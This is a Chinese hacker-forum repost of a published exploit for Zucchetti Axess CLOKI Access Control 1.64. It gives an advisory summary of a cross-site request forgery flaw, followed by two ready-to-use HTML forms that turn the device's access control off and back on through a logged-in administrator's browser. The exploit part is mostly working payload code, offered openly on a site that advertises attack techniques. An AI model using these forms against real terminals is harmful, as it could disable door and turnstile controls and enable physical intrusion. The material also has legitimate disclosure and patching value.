跳转到帖子
  • 游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

    赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

    TheHackerWorld官方

Zucchetti Axess CLOKI Access Control 1.64 - Cross Site Request Forgery (CSRF)


HACK1949

推荐的帖子

# Exploit Title: Zucchetti Axess CLOKI Access Control 1.64 - Cross Site Request Forgery (CSRF)
# Date: 13/12/2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.axesstmc.com/cloki/

<!--

Zucchetti Axess CLOKI Access Control 1.64 CSRF Disable Access Control


Vendor: Zucchetti Axess S.p.A.
Product web page: https://www.axesstmc.com
Affected version: 1.64
                  1.63
                  1.54


Summary: CLOKI is the pre-installed application on our terminals that
provides simple to use access control management and attendance monitoring
using any browser (IE, Chrome, Firefox, etc.). It is suited for anyone
looking for a stand-alone Access Control and Attendance Monitoring system
where the users' data is not frequently changed. Data management is simple
and intuitive and no additional software is needed on the PC intend to use
as WEB base. CLOKI for Access Control also allows configuration and monitoring
of access at all company entrances (doors, gates, turnstiles etc). The Access
Control manages any type of reader, entrance and access credential. Using an
impartial selector it is possible to check that employees do not take company
assets and allows registration of all accesses to the system and all operations
that users carry out.

Desc: The application interface allows users to perform certain actions via HTTP
requests without performing any validity checks to verify the requests. These
actions can be exploited to perform authentication detriment and account password
change with administrative privileges if a logged-in user visits a malicious web
site.

Tested on: Start X3 (h02 build 4163)
           Start X1 (g01 build 2804)
           X1/X2/X3/X4/X7 Web Server


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2021-5689
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5689.php


13.11.2021

-->


CSRF disable AC:
----------------
<html>
  <body>
    <form action="http://10.0.0.2:8081/redirect.cgi">
      <input type="hidden" name="flagAccessControlChanged" value="true" />
      <input type="hidden" name="RAct" value="5" />
      <input type="hidden" name="EnR" value="1" />
      <input type="hidden" name="ExR" value="1" />
      <input type="hidden" name="DenyRTout" value="5" />
      <input type="hidden" name="DenyR" value="0" />
      <input type="hidden" name="IType" value="0" />
      <input type="hidden" name="E485" value="on" />
      <input type="hidden" name="GType" value="0" />
      <input type="hidden" name="TOO" value="50" />
      <input type="hidden" name="TOC" value="50" />
      <input type="hidden" name="TOOE" value="100" />
      <input type="hidden" name="TOCE" value="100" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


CSRF enable AC:
---------------
<html>
  <body>
    <form action="http://10.0.0.2:8081/redirect.cgi">
      <input type="hidden" name="flagAccessControlChanged" value="true" />
      <input type="hidden" name="ACtrl" value="on" />
      <input type="hidden" name="RAct" value="5" />
      <input type="hidden" name="EnR" value="1" />
      <input type="hidden" name="ExR" value="1" />
      <input type="hidden" name="DenyRTout" value="5" />
      <input type="hidden" name="DenyR" value="0" />
      <input type="hidden" name="IType" value="0" />
      <input type="hidden" name="E485" value="on" />
      <input type="hidden" name="GType" value="0" />
      <input type="hidden" name="TOO" value="50" />
      <input type="hidden" name="TOC" value="50" />
      <input type="hidden" name="TOOE" value="100" />
      <input type="hidden" name="TOCE" value="100" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
            
链接帖子
意见的链接
分享到其他网站

黑客攻防讨论组

黑客攻防讨论组

    You don't have permission to chat.
    • 最近浏览   0位会员

      • 没有会员查看此页面。
    ×
    ×
    • 创建新的...